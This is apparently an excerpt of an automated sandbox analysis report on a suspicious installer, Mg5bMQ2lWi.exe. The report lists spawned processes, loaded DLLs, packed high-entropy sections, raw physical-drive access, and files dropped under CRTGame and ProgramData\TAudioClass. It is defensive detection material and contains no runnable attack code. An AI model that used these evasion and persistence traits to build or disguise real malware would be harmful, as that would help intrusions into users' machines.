                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp "C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp" /SL5="$1043A,6985375,54272,C:\Users\user\Desktop\Mg5bMQ2lWi.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /QueryJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -iJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\system32\net.exe" helpmsg 10Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpProcess created: C:\Program Files (x86)\CRTGame\crtgame.exe "C:\Program Files (x86)\CRTGame\crtgame.exe" -sJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 helpmsg 10Jump to behavior
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: explorerframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: sfc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpWindow found: window name: TMainFormJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: Mg5bMQ2lWi.exeStatic file information: File size 7240000 > 1048576
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-OGODD.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-1CHIA.tmp.1.dr

                  Data Obfuscation

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.hsave:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 4.2.crtgame.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0044C030 LoadLibraryA,GetProcAddress,GetProcAddress,1_2_0044C030
                  Source: initial sampleStatic PE information: section where entry point is pointing to: petite
                  Source: crtgame.exe.1.drStatic PE information: section name: .hsave
                  Source: is-63DO2.tmp.1.drStatic PE information: section name: /4
                  Source: is-83310.tmp.1.drStatic PE information: section name: /4
                  Source: is-CA2OV.tmp.1.drStatic PE information: section name: /4
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /4
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /19
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /31
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /45
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /57
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /70
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /81
                  Source: is-PBK8V.tmp.1.drStatic PE information: section name: /92
                  Source: is-1CHIA.tmp.1.drStatic PE information: section name: .trace
                  Source: is-1CHIA.tmp.1.drStatic PE information: section name: _RDATA
                  Source: is-1CHIA.tmp.1.drStatic PE information: section name: .debug_o
                  Source: is-UG8V7.tmp.1.drStatic PE information: section name: /4
                  Source: is-04UN3.tmp.1.drStatic PE information: section name: /4
                  Source: is-6JHM7.tmp.1.drStatic PE information: section name: /4
                  Source: is-GKK7D.tmp.1.drStatic PE information: section name: /4
                  Source: is-EQ4MD.tmp.1.drStatic PE information: section name: /4
                  Source: is-EI90O.tmp.1.drStatic PE information: section name: /4
                  Source: is-GRQ3N.tmp.1.drStatic PE information: section name: /4
                  Source: is-EI0VO.tmp.1.drStatic PE information: section name: /4
                  Source: is-HI2BI.tmp.1.drStatic PE information: section name: /4
                  Source: is-M7CIT.tmp.1.drStatic PE information: section name:
                  Source: is-M7CIT.tmp.1.drStatic PE information: section name:
                  Source: is-M7CIT.tmp.1.drStatic PE information: section name: petite
                  Source: is-JMEV2.tmp.1.drStatic PE information: section name: /4
                  Source: is-J3HC1.tmp.1.drStatic PE information: section name:
                  Source: is-J3HC1.tmp.1.drStatic PE information: section name:
                  Source: is-J3HC1.tmp.1.drStatic PE information: section name: petite
                  Source: is-C877S.tmp.1.drStatic PE information: section name:
                  Source: is-C877S.tmp.1.drStatic PE information: section name:
                  Source: is-C877S.tmp.1.drStatic PE information: section name: petite
                  Source: is-LTIA8.tmp.1.drStatic PE information: section name:
                  Source: is-LTIA8.tmp.1.drStatic PE information: section name: petite
                  Source: is-AT6AE.tmp.1.drStatic PE information: section name:
                  Source: is-AT6AE.tmp.1.drStatic PE information: section name:
                  Source: is-AT6AE.tmp.1.drStatic PE information: section name: petite
                  Source: is-BA6TO.tmp.1.drStatic PE information: section name: /4
                  Source: is-1KFVE.tmp.1.drStatic PE information: section name: .sxdata
                  Source: is-FBHLC.tmp.1.drStatic PE information: section name: .didata
                  Source: is-001GJ.tmp.1.drStatic PE information: section name:
                  Source: is-001GJ.tmp.1.drStatic PE information: section name:
                  Source: is-001GJ.tmp.1.drStatic PE information: section name: petite
                  Source: is-MJ59N.tmp.1.drStatic PE information: section name:
                  Source: is-MJ59N.tmp.1.drStatic PE information: section name: petite
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name:
                  Source: is-P0GV3.tmp.1.drStatic PE information: section name:
                  Source: is-P0GV3.tmp.1.drStatic PE information: section name:
                  Source: is-P0GV3.tmp.1.drStatic PE information: section name: petite
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name:
                  Source: is-40N44.tmp.1.drStatic PE information: section name:
                  Source: is-40N44.tmp.1.drStatic PE information: section name:
                  Source: is-40N44.tmp.1.drStatic PE information: section name: petite
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name:
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name:
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name: petite
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name:
                  Source: is-L705K.tmp.1.drStatic PE information: section name:
                  Source: is-L705K.tmp.1.drStatic PE information: section name:
                  Source: is-L705K.tmp.1.drStatic PE information: section name: petite
                  Source: is-NJ7JN.tmp.1.drStatic PE information: section name: /4
                  Source: is-DMP2Q.tmp.1.drStatic PE information: section name: /4
                  Source: is-JB8NH.tmp.1.drStatic PE information: section name: /4
                  Source: is-ITM21.tmp.1.drStatic PE information: section name: /4
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: is-44UDD.tmp.1.drStatic PE information: section name:
                  Source: is-DFCBR.tmp.1.drStatic PE information: section name: /4
                  Source: is-GUEH6.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-060C4.tmp.1.drStatic PE information: section name: asmcode
                  Source: is-D14K1.tmp.1.drStatic PE information: section name: .eh_fram
                  Source: is-GSP1P.tmp.1.drStatic PE information: section name: /4
                  Source: is-VP35T.tmp.1.drStatic PE information: section name: /4
                  Source: is-B8HMN.tmp.1.drStatic PE information: section name: /4
                  Source: TAudioClass.exe.4.drStatic PE information: section name: .hsave
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_004065B8 push 004065F5h; ret 0_2_004065ED
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                  Source: C:\Users\user\Desktop\Mg5bMQ2lWi.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00409954 push 00409991h; ret 1_2_00409989
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040A04F push ds; ret 1_2_0040A050
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040A023 push ds; ret 1_2_0040A04D
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004062CC push ecx; mov dword ptr [esp], eax1_2_004062CD
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004822F4 push 004823D2h; ret 1_2_004823CA
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004765B0 push ecx; mov dword ptr [esp], edx1_2_004765B1
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004106E0 push ecx; mov dword ptr [esp], edx1_2_004106E5
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00412938 push 0041299Bh; ret 1_2_00412993
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004589F0 push 00458A34h; ret 1_2_00458A2C
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00442C94 push ecx; mov dword ptr [esp], ecx1_2_00442C98
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_00450E58 push 00450E8Bh; ret 1_2_00450E83
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045101C push ecx; mov dword ptr [esp], eax1_2_00451021
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040D038 push ecx; mov dword ptr [esp], edx1_2_0040D03A
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0049310C push ecx; mov dword ptr [esp], ecx1_2_00493111
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004571B0 push 004571E8h; ret 1_2_004571E0
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0045F444 push ecx; mov dword ptr [esp], ecx1_2_0045F448
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040F598 push ecx; mov dword ptr [esp], edx1_2_0040F59A
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                  Source: crtgame.exe.1.drStatic PE information: section name: .text entropy: 7.587380705080058
                  Source: is-3DBAJ.tmp.1.drStatic PE information: section name: entropy: 7.953893773659523
                  Source: is-C9QMS.tmp.1.drStatic PE information: section name: entropy: 7.921519965168042
                  Source: is-KR7LG.tmp.1.drStatic PE information: section name: entropy: 7.966771808365004
                  Source: is-HVEOK.tmp.1.drStatic PE information: section name: entropy: 7.950928332152424
                  Source: is-44UDD.tmp.1.drStatic PE information: section name: entropy: 7.491817342209834
                  Source: TAudioClass.exe.4.drStatic PE information: section name: .text entropy: 7.587380705080058

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive04_2_00401A58
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive06_2_02C2F2AF
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-FJDCA.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\uninstall\is-TGPT7.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_isdecmp.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-M7CIT.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-40N44.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-060C4.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\takdec.exe (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avfilter-9.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\lame_enc.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-DFCBR.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-JB8NH.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-EQ4MD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-ISCOD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_setup64.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-KR7LG.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-LTIA8.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-AT6AE.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HI2BI.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-4LN2K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-44UDD.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Users\user\AppData\Local\Temp\is-V1CVR.tmp\_isetup\_shfoldr.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-L705K.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-HVEOK.tmpJump to dropped file
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeFile created: C:\ProgramData\TAudioClass\TAudioClass.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\avutil-58.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-J3HC1.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-CA2OV.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\sd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\rg_ebur128.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)Jump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\is-CKJ1G.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmpFile created: C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)Jump to dropped file
